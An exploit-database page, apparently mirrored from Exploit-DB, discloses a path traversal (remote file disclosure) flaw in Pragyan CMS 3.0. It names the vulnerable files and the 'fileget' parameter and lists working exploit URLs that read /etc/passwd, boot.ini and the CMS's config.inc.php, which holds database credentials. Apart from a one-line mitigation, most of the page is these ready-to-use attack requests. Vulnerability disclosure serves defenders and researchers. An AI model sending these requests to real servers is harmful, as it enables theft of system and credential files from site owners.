header-logo
Suggest Exploit
vendor:
Pragyan CMS
by:
Or4nG.M4n
7,5
CVSS
HIGH
Remote File Disclosure
22
CWE
Product Name: Pragyan CMS
Affected Version From: 3.0
Affected Version To: 3.0
Patch Exists: NO
Related CWE: N/A
CPE: a:pragyan:pragyan_cms:3.0
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2020

Pragyan CMS v 3.0 => [Remote File Disclosure]

The vulnerability exists in the download.lib.php line 16 and index.php line 234. An attacker can exploit this vulnerability by sending a crafted HTTP request with the parameter 'fileget' set to '../../../../../../../../../../../../ etc/passwd . boot.ini' to download the file. Similarly, an attacker can download the config file by setting the parameter 'fileget' to '../../../../../../../../../../../../appserv/www/Pragyan/cms/config.inc.php' or '../../../../../../../../../../../../home/exploitdb/public_html/Pragyan/cms/config.inc.php'.

Mitigation:

The vendor should patch the vulnerable code and restrict access to the vulnerable files.
Source

Exploit-DB raw data:

Title    
Pragyan CMS v 3.0 => [Remote File Disclosure] 
Author   
Or4nG.M4n
Download 
http://space.dl.sourceforge.net/project/pragyan/pragyan/3.0/PragyanCMS-v3.0-beta.tar.bz2

vuln
download.lib.php line 16
vuln
index.php line 234

$_GET['fileget']
 
exploit  http://localhost/Pragyan/?page=/&action=profile&fileget=../../../../../../../../../../../../  etc/passwd . boot.ini

Download Config file 
exploit  /Pragyan/?page=/&action=profile&fileget=../../../../../../../../../../../../appserv/www/Pragyan/cms/config.inc.php
exploit  /Pragyan/?page=/&action=profile&fileget=../../../../../../../../../../../../home/exploitdb/public_html/Pragyan/cms/config.inc.php

Navigation

Suggest Exploit

Services By CQR